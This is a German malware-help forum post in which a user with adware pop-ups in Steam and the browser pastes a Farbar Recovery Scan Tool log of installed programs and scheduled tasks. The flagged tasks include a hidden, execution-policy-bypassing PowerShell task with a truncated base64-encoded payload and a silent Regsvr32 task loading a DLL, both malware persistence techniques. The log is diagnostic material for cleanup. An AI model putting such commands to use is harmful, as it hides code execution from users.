Zurück   Trojaner-Board > Malware entfernen > Plagegeister aller Art und deren Bekämpfung

Plagegeister aller Art und deren Bekämpfung: Werbung bei Steam und Browser

Windows 7 Wenn Du nicht sicher bist, ob Du dir Malware oder Trojaner eingefangen hast, erstelle hier ein Thema. Ein Experte wird sich mit weiteren Anweisungen melden und Dir helfen die Malware zu entfernen oder Unerwünschte Software zu deinstallieren bzw. zu löschen. Bitte schildere dein Problem so genau wie möglich. Sollte es ein Trojaner oder Viren Problem sein wird ein Experte Dir bei der Beseitigug der Infektion helfen.

Antwort
Alt 08.11.2016, 15:01   #1
Pudding0304
 
Werbung bei Steam und Browser - Standard

Werbung bei Steam und Browser



Hallo,
ich habe folgendes Problem, in meinem Browser und in Steam wird durch Pop Ups Werbung angezeigt.Es öffnet sich auch sehr oft eine Seite, bei der ich mir Reimage Repair herunterladen soll.Facebook und Youtube funktionieren aber ohne Probleme. Ich habe mal eine Untersuchung mit Farbar Recovery Scan Tool gemacht:
Code:
ATTFilter
Zusätzliches Untersuchungsergebnis von Farbar Recovery Scan Tool (x64) Version: 04-11-2016
durchgeführt von Administrator (08-11-2016 14:45:36)
Gestartet von C:\Users\Administrator\Downloads
Windows 10 Home Version 1607 (X64) (2016-10-19 12:14:45)
Start-Modus: Normal
==========================================================


==================== Konten: =============================

Administrator (S-1-5-21-281671067-3093265053-1301455503-500 - Administrator - Enabled) => C:\Users\Administrator
DefaultAccount (S-1-5-21-281671067-3093265053-1301455503-503 - Limited - Disabled)
Gast (S-1-5-21-281671067-3093265053-1301455503-501 - Limited - Disabled)

==================== Sicherheits-Center ========================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er entfernt.)

AV: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

==================== Installierte Programme ======================

(Nur Adware-Programme mit dem Zusatz "Hidden" können in die Fixlist aufgenommen werden, um sie sichtbar zu machen. Die Adware-Programme sollten manuell deinstalliert werden.)

Adobe Creative Cloud (HKLM-x32\...\Adobe Creative Cloud) (Version: 3.7.0.272 - Adobe Systems Incorporated)
Adobe Flash Player 23 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 23.0.0.205 - Adobe Systems Incorporated)
Adobe Photoshop CC 2015.5 (HKLM-x32\...\PHSP_17_0) (Version: 17.0.0 - Adobe Systems Incorporated)
Age of Empires II: HD Edition (HKLM\...\Steam App 221380) (Version:  - Skybox Labs)
AION Free-to-Play (HKLM-x32\...\{82E73E8D-E1E7-45A4-A311-6D31492AA913}_is1) (Version:  - Gameforge4d)
Amazon 1Button App (x32 Version: 2.3.4 - Amazon) Hidden <==== ACHTUNG
Amazon Assistant (HKLM-x32\...\Amazon Assistant) (Version: 2.3.4 - Amazon) <==== ACHTUNG
ARK: Survival Evolved (HKLM\...\Steam App 346110) (Version:  - Studio Wildcard)
ARK: Survival Of The Fittest (HKLM\...\Steam App 407530) (Version:  - Studio Wildcard)
Battle.net (HKLM-x32\...\Battle.net) (Version:  - Blizzard Entertainment)
Brawlhalla (HKLM\...\Steam App 291550) (Version:  - Blue Mammoth Games)
Brick-Force (HKLM\...\Steam App 335330) (Version:  - Exe Games Inc.)
Canon MG5100 series MP Drivers (HKLM\...\{1199FAD5-9546-44f3-81CF-FFDB8040B7BF}_Canon_MG5100_series) (Version:  - )
CCleaner (HKLM\...\CCleaner) (Version: 5.14 - Piriform)
CDBurnerXP (HKLM-x32\...\{7E265513-8CDA-4631-B696-F40D983F3B07}_is1) (Version: 4.5.3.4643 - CDBurnerXP)
Cisco EAP-FAST Module (HKLM-x32\...\{64BF0187-F3D2-498B-99EA-163AF9AE6EC9}) (Version: 2.2.14 - Cisco Systems, Inc.)
Cisco LEAP Module (HKLM-x32\...\{AF312B06-5C5C-468E-89B3-BE6DE2645722}) (Version: 1.0.19 - Cisco Systems, Inc.)
Cisco PEAP Module (HKLM-x32\...\{0A4EF0E6-A912-4CDE-A7F3-6E56E7C13A2F}) (Version: 1.1.6 - Cisco Systems, Inc.)
Components (x32 Version: 1.0.023.00 - Lenovo) Hidden
Curse (HKLM-x32\...\{1F2611FB-6F69-4AA8-BECD-243BD8CB45F3}) (Version: 6.0.0.0 - Curse)
D3DX10 (x32 Version: 15.4.2368.0902 - Microsoft) Hidden
Desktopicon amazon.de (HKLM\...\DesktopIconAmazon) (Version: 1.0.1 - )
Dragomon Hunter (HKLM\...\Steam App 356330) (Version:  - X-Legend)
Drakensang Online (HKLM-x32\...\Drakensang Online) (Version:  - )
Dropbox (HKLM-x32\...\Dropbox) (Version: 13.4.21 - Dropbox, Inc.)
Dropbox Update Helper (x32 Version: 1.3.51.1 - Dropbox, Inc.) Hidden
Evolve Stage 2 (HKLM\...\Steam App 273350) (Version:  - Turtle Rock Studios)
Fotogalerie (x32 Version: 16.4.3528.0331 - Microsoft Corporation) Hidden
Fractured Space (HKLM\...\Steam App 310380) (Version:  - Edge Case Games Ltd.)
Free Instagram Download (HKLM-x32\...\Free Instagram Download_is1) (Version: 2.1.20.608 - Digital Wave Ltd)
Free Mouse and Keyboard Recorder 3.1.3.2 (HKLM-x32\...\{9A6EBB57-EA22-4086-81A0-8FD9843D0CA1}_is1) (Version:  - Robot-Soft.com, Inc.)
Gameforge Live 2.0.12 (HKLM-x32\...\{9C98989A-3A15-42DA-A3B9-D20331437D67}}_is1) (Version: 2.0.12 - Gameforge)
GhostMouse (HKLM-x32\...\GhostMouse_is1) (Version: Free V3.2.3 - ghost-mouse.com)
GIMP 2.8.2 (HKLM\...\GIMP-2_is1) (Version: 2.8.2 - The GIMP Team)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 54.0.2840.71 - Google Inc.)
Google Update Helper (HKLM-x32\...\{A92DAB39-4E2C-4304-9AB6-BC44E68B55E2}) (Version:  - )
Google Update Helper (x32 Version: 1.3.31.5 - Google Inc.) Hidden
H1Z1: Just Survive (HKLM\...\Steam App 295110) (Version:  - Daybreak Game Company)
H1Z1: Just Survive Test Server (HKLM\...\Steam App 362300) (Version:  - )
Hearthstone (HKLM-x32\...\Hearthstone) (Version:  - Blizzard Entertainment)
Heroes of the Storm (HKLM-x32\...\Heroes of the Storm) (Version:  - Blizzard Entertainment)
Intel Security True Key (HKLM\...\TrueKey) (Version: 4.4.135.1 - Intel Security)
Intel(R) Management Engine Components (HKLM\...\{1CEAC85D-2590-4760-800F-8DE5E91F3700}) (Version: 11.0.0.1158 - Intel Corporation)
Intel(R) Rapid Storage Technology (HKLM\...\{409CB30E-E457-4008-9B1A-ED1B9EA21140}) (Version: 14.5.0.1081 - Intel Corporation)
Intel® Chipsatz-Gerätesoftware (x32 Version: 10.1.1.7 - Intel(R) Corporation) Hidden
Intel® Security Assist (HKLM-x32\...\{4B230374-6475-4A73-BA6E-41015E9C5013}) (Version: 1.0.0.532 - Intel Corporation)
IrfanView (remove only) (HKLM-x32\...\IrfanView) (Version: 4.36 - Irfan Skiljan)
Istrolid (HKLM\...\Steam App 449140) (Version:  - treeform)
Java 8 Update 91 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83218091F0}) (Version: 8.0.910.14 - Oracle Corporation)
League of Legends (HKLM-x32\...\League of Legends 4.1.2) (Version: 4.1.2 - Riot Games)
League of Legends (x32 Version: 4.1.2 - Riot Games) Hidden
Lenovo Blacksilk USB Keyboard Driver (HKLM-x32\...\{B266E062-D6C5-485B-B426-51B152B041A6}) (Version: V1.6.13.0724 - Lenovo)
Lenovo Experience Improvement (HKLM\...\LenovoExperienceImprovement) (Version: 2.0.9.0 - Lenovo)
Lenovo Photos (HKLM-x32\...\Lenovo Photos) (Version: 6.0.4 - CEWE Stiftung u Co. KGaA)
Lenovo Power2Go (HKLM-x32\...\InstallShield_{40BF1E83-20EB-11D8-97C5-0009C5020658}) (Version: 6.0.8231 - CyberLink Corp.)
Lenovo Power2Go (x32 Version: 6.0.8231 - CyberLink Corp.) Hidden
Lenovo PowerDVD12 (HKLM-x32\...\InstallShield_{B46BEA36-0B71-4A4E-AE41-87241643FA0A}) (Version: 12.0.5320.55 - CyberLink Corp.)
Lenovo PowerDVD12 (x32 Version: 12.0.5320.55 - CyberLink Corp.) Hidden
Lenovo QuickOptimizer (HKLM\...\{8D2C871B-1B9F-45AC-9C43-2BB18089CDFA}) (Version: 1.0.022.00 - Lenovo)
Lenovo Rescue System (HKLM-x32\...\InstallShield_{46F4D124-20E5-4D12-BE52-EC177A7A4B42}) (Version: 4.0.0.4212 - CyberLink Corp.)
Lenovo Rescue System (Version: 4.0.0.4212 - CyberLink Corp.) Hidden
Lenovo Solution Center (HKLM\...\{C1FC707B-AE6B-4DC4-89A5-6628A01F8103}) (Version: 3.3.003.00 - Lenovo)
Lenovo System Interface Foundation (HKLM\...\{C2E5CA37-C862-4A69-AC6D-24F450A20C16}) (Version: 1.0.054.00 - Lenovo)
Lightworks (HKLM-x32\...\{E94DD4E4-7746-472c-AA7B-1242FED0CFC8}) (Version: 12.6.0.0 - Lightworks)
LogMeIn Hamachi (HKLM-x32\...\LogMeIn Hamachi) (Version: 2.2.0.519 - LogMeIn, Inc.)
LogMeIn Hamachi (x32 Version: 2.2.0.519 - LogMeIn, Inc.) Hidden
Manual (HKLM-x32\...\{693F92E5-37D1-46B7-A0D6-19A74A2FD0EC}) (Version: 1.00.0701 - Lenovo)
McAfee Security Scan Plus (HKLM\...\McAfee Security Scan) (Version: 3.11.427.2 - McAfee, Inc.)
McAfee WebAdvisor (HKLM-x32\...\{35ED3F83-4BDC-4c44-8EC6-6A8301C7413A}) (Version: 4.0.279 - McAfee, Inc.)
Metric Collection SDK 35 (x32 Version: 1.2.0010.00 - Lenovo Group Limited) Hidden
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{837b34e3-7c30-493c-8f6a-2b0f04e2912c}) (Version: 8.0.59193 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{071c9b48-7c32-4621-a0ac-3f809523288f}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{6ce5bae9-d3ca-4b99-891a-1dc6c118a5fc}) (Version: 8.0.59192 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.24210 (HKLM-x32\...\{f144e08f-9cbe-4f09-9a8c-f2b858b7ee7f}) (Version: 14.0.24210.0 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x86) - 14.0.24210 (HKLM-x32\...\{23658c02-145e-483d-ba6b-1eb82c580529}) (Version: 14.0.24210.0 - Microsoft Corporation)
Minecraft 1.8 1.00 (HKLM-x32\...\Minecraft 1.8 1.00) (Version:  - )
MouseRecorder v1.0.47 (HKLM-x32\...\MouseRecorder_is1) (Version: 1.0.47 - Bartels Media GmbH)
Movie Maker (x32 Version: 16.4.3528.0331 - Microsoft Corporation) Hidden
Mozilla Firefox 49.0.1 (x86 de) (HKLM-x32\...\Mozilla Firefox 49.0.1 (x86 de)) (Version: 49.0.1 - Mozilla)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 49.0.1 - Mozilla)
NCSOFT Game Launcher (HKLM-x32\...\NCLauncher_NCWest) (Version:  - NCSOFT)
NVIDIA HD-Audiotreiber 1.3.34.3 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_HDAudio.Driver) (Version: 1.3.34.3 - NVIDIA Corporation)
NVIDIA PhysX-Systemsoftware 9.15.0428 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.PhysX) (Version: 9.15.0428 - NVIDIA Corporation)
OneSafe PC Cleaner v4 (HKLM-x32\...\OneSafe PC Cleaner_is1) (Version: 4.2 - )
Overwolf (HKLM-x32\...\Overwolf) (Version: 0.99.11.0 - Overwolf Ltd.)
Pokemon Online Version 2.6.2.1 (HKLM-x32\...\{3D3DE059-3951-47BE-BD7C-664898D14138}_is1) (Version: 2.6.2.1 - Pokemon Online)
REALTEK Bluetooth Filter Driver (HKLM-x32\...\{9D3D8C60-A5EF-4123-B2B9-172095903AD}) (Version: 1.3.868.060315 - REALTEK Semiconductor Corp.)
Realtek Card Reader (HKLM-x32\...\{5BC2B5AB-80DE-4E83-B8CF-426902051D0A}) (Version: 10.0.10125.31214 - Realtek Semiconductor Corp.)
Realtek Ethernet Controller All-In-One Windows Driver (HKLM-x32\...\{F7E7F0CB-AA41-4D5A-B6F2-8E6738EB063F}) (Version: 10.1.505.2015 - Realtek)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.7525 - Realtek Semiconductor Corp.)
REALTEK Wireless LAN Driver (HKLM-x32\...\{9DAABC60-A5EF-41FF-B2B9-17329590CD5}) (Version: 1.00.0269 - REALTEK Semiconductor Corp.)
Reimage Repair (HKLM\...\Reimage Repair) (Version: 1.8.4.8 - Reimage) <==== ACHTUNG
Rust (HKLM\...\Steam App 252490) (Version:  - Facepunch Studios)
Search Provided by Yahoo (HKLM-x32\...\YahooProvidedSearch) (Version:  - ) <==== ACHTUNG
SHAREit (HKLM-x32\...\SHAREit_is1) (Version: 2.5.5.0 - Lenovo)
ShellShock Live (HKLM\...\Steam App 326460) (Version:  - kChamp Games)
shopperz (HKLM-x32\...\{7160407F-80DF-4A9A-8B23-AEFD2A77F6F0}) (Version: 2.0.0.480 - shopperz) <==== ACHTUNG
Skype™ 7.29 (HKLM-x32\...\{FC965A47-4839-40CA-B618-18F486F042C6}) (Version: 7.29.102 - Skype Technologies S.A.)
Sound+ (HKLM\...\SoundPlus) (Version: 1.0 - ) <==== ACHTUNG
Steam (HKLM-x32\...\Steam) (Version: 2.10.91.91 - Valve Corporation)
TeamSpeak 3 Client (HKU\S-1-5-21-281671067-3093265053-1301455503-500\...\TeamSpeak 3 Client) (Version: 3.0.19 - TeamSpeak Systems GmbH)
thriXXX-Launcher (HKLM-x32\...\thriXXX-Launcher) (Version:  - thriXXX Software GmbH)
Toribash (HKLM\...\Steam App 248570) (Version:  - Nabi Studios)
Unity Web Player (HKU\S-1-5-21-281671067-3093265053-1301455503-500\...\UnityWebPlayer) (Version: 5.3.6f1 - Unity Technologies ApS)
Unity Web Player (x64) (All users) (HKLM\...\UnityWebPlayer) (Version: 5.3.6f1 - Unity Technologies ApS)
Unturned (HKLM\...\Steam App 304930) (Version:  - Smartly Dressed Games)
Visual Studio 2012 x64 Redistributables (HKLM\...\{8C775E70-A791-4DA8-BCC3-6AB7136F4484}) (Version: 14.0.0.1 - AVG Technologies)
Visual Studio 2012 x86 Redistributables (HKLM-x32\...\{98EFF19A-30AB-4E4B-B943-F06B1C63EBF8}) (Version: 14.0.0.1 - AVG Technologies CZ, s.r.o.)
VLC media player (HKLM-x32\...\VLC media player) (Version: 2.2.4 - VideoLAN)
Wajam (HKLM-x32\...\9658931ae26d5b9622143f239e1f2b77) (Version: 1.68.12.3 - Wajam) <==== ACHTUNG
Windows Live Essentials (HKLM-x32\...\WinLiveSuite) (Version: 16.4.3528.0331 - Microsoft Corporation)
Windows-Treiberpaket - NVIDIA (nvlddmkm) Display  (07/22/2015 10.18.13.5362) (HKLM\...\81C36D5B443FFB6F528F76BD424D750C53ADF10E) (Version: 07/22/2015 10.18.13.5362 - NVIDIA)
Windows-Treiberpaket - NVIDIA (nvlddmkm) Display  (08/30/2015 10.18.13.5407) (HKLM\...\720DDDFCF9AD485DE94B23B407666AF509CFA345) (Version: 08/30/2015 10.18.13.5407 - NVIDIA)
Windows-Treiberpaket - NVIDIA Corporation (NVHDA) MEDIA  (04/16/2015 1.3.34.3) (HKLM\...\E1EF4D4E1E41BA85DB6DA51424B73AE1B3F0056A) (Version: 04/16/2015 1.3.34.3 - NVIDIA Corporation)
Windows-Treiberpaket - Realtek (rt640x64) Net  (05/05/2015 10.001.0505.2015) (HKLM\...\6A304520C2F25CD034E477A379C47308AA84A2DC) (Version: 05/05/2015 10.001.0505.2015 - Realtek)
Windows-Treiberpaket - Realtek Semiconductor Corp. (RtkBtFilter) Bluetooth  (06/11/2015 1.3.868.3) (HKLM\...\604A7B07184AD24892732BED4543610976632257) (Version: 06/11/2015 1.3.868.3 - Realtek Semiconductor Corp.)
WinRAR 5.31 (64-Bit) (HKLM\...\WinRAR archiver) (Version: 5.31.0 - win.rar GmbH)
Wondershare Filmora(Build 7.2.0) (HKLM\...\Wondershare Filmora_is1) (Version:  - Wondershare Software)
Wondershare Video Converter Ultimate(Build 8.6.0.0) (HKLM-x32\...\Wondershare Video Converter Ultimate_is1) (Version: 8.6.0.0 - Wondershare Software)
World of Warcraft (HKLM-x32\...\World of Warcraft) (Version:  - Blizzard Entertainment)
YAC(Yet Another Cleaner!) (HKLM-x32\...\iSafe) (Version:  - ELEX DO BRASIL PARTICIPAÇÕES LTDA) <==== ACHTUNG

==================== Benutzerdefinierte CLSID (Nicht auf der Ausnahmeliste): ==========================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

CustomCLSID: HKU\S-1-5-21-281671067-3093265053-1301455503-500_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\InprocServer32 -> C:\WINDOWS\system32\shell32.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-281671067-3093265053-1301455503-500_Classes\CLSID\{71DCE5D6-4B57-496B-AC21-CD5B54EB93FD}\localserver32 -> C:\Users\Administrator\AppData\Local\Microsoft\OneDrive\17.3.6390.0509\FileCoAuth.exe (Microsoft Corporation)

==================== Geplante Aufgaben (Nicht auf der Ausnahmeliste) =============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

Task: {0495B18D-C1E6-4D72-BE22-969F5F69C84E} - System32\Tasks\Lenovo\Experience Improvement => C:\Program Files\Lenovo\ExperienceImprovement\LenovoExperienceImprovement.exe
Task: {0730BFE6-D57F-4E0E-991C-3A4007C40FC5} - System32\Tasks\AVGPCTuneUp_Task_BkGndMaintenance => C:\Program Files (x86)\AVG\AVG PC TuneUp\tuscanx.exe
Task: {11DE55D8-8370-49D6-972D-E050BF820248} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: {1455C6F2-4076-445F-B598-E9B46C2BA165} - System32\Tasks\Lenovo\ImController\Plugins\LenovoSystemUpdatePlugin_TVSUUpdateTask => add hklm\SOFTWARE\Lenovo\SystemUpdatePlugin\scheduler  /v start /t reg_dword /d 1 /f /reg:32
Task: {177AE76F-D709-487D-AC37-898460C285F2} - System32\Tasks\rdf3019 => C:\Program Files (x86)\QuickSearch\rdf3019.exe <==== ACHTUNG
Task: {19A992CD-6594-46BA-A1EE-B4D0389E5213} - System32\Tasks\SystemHealer Monitor => C:\Program Files (x86)\SystemHealer\HealerConsole.exe <==== ACHTUNG
Task: {1A7C6533-77F1-4A9F-9656-010D9AB466E6} - System32\Tasks\OneSafe PC Cleaner Schedule => C:\Program Files (x86)\OneSafe PC Cleaner\OSPCSchedule.exe [2016-11-04] (Avanquest Software)
Task: {1D7DC57C-FEDE-471C-AF98-4E9F7A1D9BBA} - System32\Tasks\WinTaske => C:\Program Files (x86)\WinTaske\WinTaske\WinTaske.exe <==== ACHTUNG
Task: {2A42B7A8-D035-4354-A58E-8D2996ADD57E} - System32\Tasks\DistromaticUpdater-logon => C:\Program Files (x86)\Amazon Browser Settings\updater.exe <==== ACHTUNG
Task: {32A61B6C-3FCB-4AB2-993A-E0DD118C6094} - System32\Tasks\Browsing Secure Updater => C:\Program Files (x86)\\Browsing Secure\\BrowsingSecure\\2.0.0.0\Browsing Secureupdt.exe
Task: {356F48CA-5886-4CF6-8130-BA49D4EFB256} - System32\Tasks\DistromaticSearchProtect-hourly => C:\Program Files (x86)\Amazon Browser Settings\AmznSearchProtect.exe <==== ACHTUNG
Task: {360EDB91-5FEB-485F-BF7E-CB4BED5F0978} - System32\Tasks\WebBarUpdateTask => C:\Program Files\WebBar\wbsvc.exe <==== ACHTUNG
Task: {36505064-57CA-45B4-AD1E-9BC4F99D1118} - System32\Tasks\DistromaticUpdater-periodic => C:\Program Files (x86)\Amazon Browser Settings\updater.exe <==== ACHTUNG
Task: {37154573-34EE-4BD1-9A22-489685DD2B36} - System32\Tasks\{742B83EF-B0CA-C187-A1E5-004F32763E89} => C:\Users\Hempe\AppData\Local\{48D27~1\UNINST~1.EXE <==== ACHTUNG
Task: {3D34BFC0-4C57-445A-B939-816E4B8ECC70} - System32\Tasks\Microsoft\Windows\RemovalTools\MRT_HB => C:\Windows\system32\MRT.exe [2016-10-13] (Microsoft Corporation)
Task: {460F0B5F-7E16-485E-BFEC-9B85C7F1BDFD} - System32\Tasks\System Healer Task => C:\PROGRA~2\SYSTEM~1\RESCUE~1.EXE <==== ACHTUNG
Task: {5A50B6E9-8D8B-451D-99CE-D4B833F80459} - System32\Tasks\Lenovo\Lenovo Customer Feedback Program 64 35 => C:\Program Files (x86)\Lenovo\Customer Feedback Program 35\Lenovo.TVT.CustomerFeedback.Agent35.exe
Task: {5DF56ED7-7121-4AA3-939A-39B8A9B008EE} - System32\Tasks\SMWUpd => C:\Program Files\Common Files\Goobzo\GBUpdate\updatehelper.exe <==== ACHTUNG
Task: {5F6E9CBF-1008-4C4D-8E86-14307561519C} - System32\Tasks\Browser Updater Task(Core) => C:\Program Files (x86)\QQBrowser\Update\Download\2937C811B0F60F96ABE396509F2CB6CE\Update\BrowserUpdate.exe <==== ACHTUNG
Task: {60B8B249-4833-49EB-A190-5CEEA0BBFE2E} - System32\Tasks\DropboxUpdateTaskMachineUA => C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe
Task: {61EE4B71-1E0B-44B3-BCA8-5061CC161C95} - System32\Tasks\IBUpd => C:\Users\Hempe\AppData\Local\BrowserAir\47.0.0.4\updater.exe <==== ACHTUNG
Task: {6C7D5347-1728-47F4-9E62-CBAAF4E528BC} - System32\Tasks\vreXjvXBrowserUpdateUA => C:\Program Files (x86)\vreXjvX\vreXjvX\bin\vreXjvX_server.exe <==== ACHTUNG
Task: {6E3A279B-2D6D-454D-BF3E-BD2E1EDD3B40} - System32\Tasks\Adobe Flash Player Updater => C:\WINDOWS\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2016-10-28] (Adobe Systems Incorporated)
Task: {719AFACD-7CD7-44A6-9605-4FD58E690E66} - System32\Tasks\SystemHealer Run Delay => C:\Program Files (x86)\SystemHealer\SystemHealer.exe <==== ACHTUNG
Task: {71DC7221-7DBC-41A7-8E8F-16EC237A4844} - System32\Tasks\Security Utility Updater => C:\Program Files (x86)\\securityutility\\securityutility\\2.0.0.1\Security Utilityupdt.exe <==== ACHTUNG
Task: {74AFB264-3A74-4EBA-94AD-B543D71B193E} - System32\Tasks\System HealerStartUp => C:\Program Files (x86)\SystemHealer\SystemHealer.exe <==== ACHTUNG
Task: {75126E20-D1C1-4D5C-A964-2A686180E27C} - System32\Tasks\{5AA3F5CC-6D52-4B06-B3DA-B80EDCE20F9F} => pcalua.exe -a "C:\Program Files (x86)\InstallShield Installation Information\{5BC2B5AB-80DE-4E83-B8CF-426902051D0A}\setup.exe" -c -runfromtemp -removeonly
Task: {7661643B-D211-4138-BF79-83E3C2CFB052} - System32\Tasks\{8351F299-3C03-ABDB-3046-2455AF23F858} => Regsvr32.exe /s /n /i:"/rt" "C:\PROGRA~3\a17e9f94\fcf4b003.dll" <==== ACHTUNG
Task: {7B7BBC26-9C97-473E-B7CF-FF62540843A6} - System32\Tasks\IBUpd2 => C:\Users\Hempe\AppData\Local\BrowserAir\47.0.0.4\updater.exe <==== ACHTUNG
Task: {7E95E830-818F-435B-9D22-F48E6F9B61F9} - System32\Tasks\vreXjvXCheckTask => C:\Program Files (x86)\vreXjvX\vreXjvX\bin\vreXjvX_server.exe <==== ACHTUNG
Task: {89713AE2-0108-4EFF-8F19-725E61F049FA} - System32\Tasks\DNSWAXHAW => dnswaxhaw.exe <==== ACHTUNG
Task: {8BB27C3B-4B94-48C5-9EF4-DC4AAAD6EA21} - System32\Tasks\{0C087847-040F-0878-0A11-7F7A7904117D} => powershell.exe -nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand IAAgACQARQByAHIAbwByAEEAYwB0AGkAbwBuAFAAcgBlAGYAZQByAGUAbgBjAGUAPQAiAHMAdABvAHAAIgA7ACQAcwBjAD0AIgBTAGkAbABlAG4AdABsAHkAQwBvAG4AdABpAG4AdQBlACIAOwAkAFcAYQByAG4AaQBuAGcAUAByAGUAZgBlAHIAZQBuAGMAZQA9ACQAcwBjADsAJABQAHIA (Der Dateneintrag hat 9908 mehr Zeichen). <==== ACHTUNG
Task: {8EC295BA-A8FE-499A-AE18-EEB81C539AB2} - System32\Tasks\Lenovo\LSC\LSCHardwareScan => C:\Program Files\Lenovo\Lenovo Solution Center\LSC.exe [2016-06-02] (Lenovo)
Task: {9452C635-5AC0-4780-89A6-0E0E277596F6} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe
Task: {9590D395-BCA9-4CC2-9417-4BE742C276BE} - System32\Tasks\ReimageUpdater => C:\Program Files\Reimage\Reimage Protector\ReiGuard.exe [2016-11-06] (Reimage®) <==== ACHTUNG
Task: {A389A843-1FA8-45B3-A7C6-0740D7553A58} - System32\Tasks\PDVDServ12 Task => C:\Program Files (x86)\Lenovo\PowerDVD12\PDVD12Serv.exe [2015-05-20] (CyberLink Corp.)
Task: {AA8A5D44-CE7C-46CC-98D5-B812F9B08675} - System32\Tasks\Lenovo\SHPrompt => C:\Program Files (x86)\Lenovo\SHAREit\ShareitPrompt.exe
Task: {AC665737-5735-4442-B1B0-99B553E612DB} - System32\Tasks\Microsoft\Windows\PLA\LSC Memory => Rundll32.exe C:\Windows\system32\pla.dll,PlaHost "LSC Memory" "$(Arg0)"
Task: {ACB83FD9-C100-4FC1-A9E4-34278B58205D} - System32\Tasks\OneDrive Standalone Update Task => C:\Users\Hempe\AppData\Local\Microsoft\OneDrive\17.3.6517.0809\OneDriveStandaloneUpdater.exe
Task: {B15A3E3E-1314-4A18-BC47-97DC15D4D7D1} - System32\Tasks\Lenovo\ImController\Lenovo iM Controller Scheduled Maintenance => control iMControllerService 128
Task: {B556B7FE-C391-4ACF-9025-AA96CCC46348} - System32\Tasks\Reimage Reminder => C:\Program Files\Reimage\Reimage Repair\ReimageReminder.exe [2016-11-01] (Reimage ltd.) <==== ACHTUNG
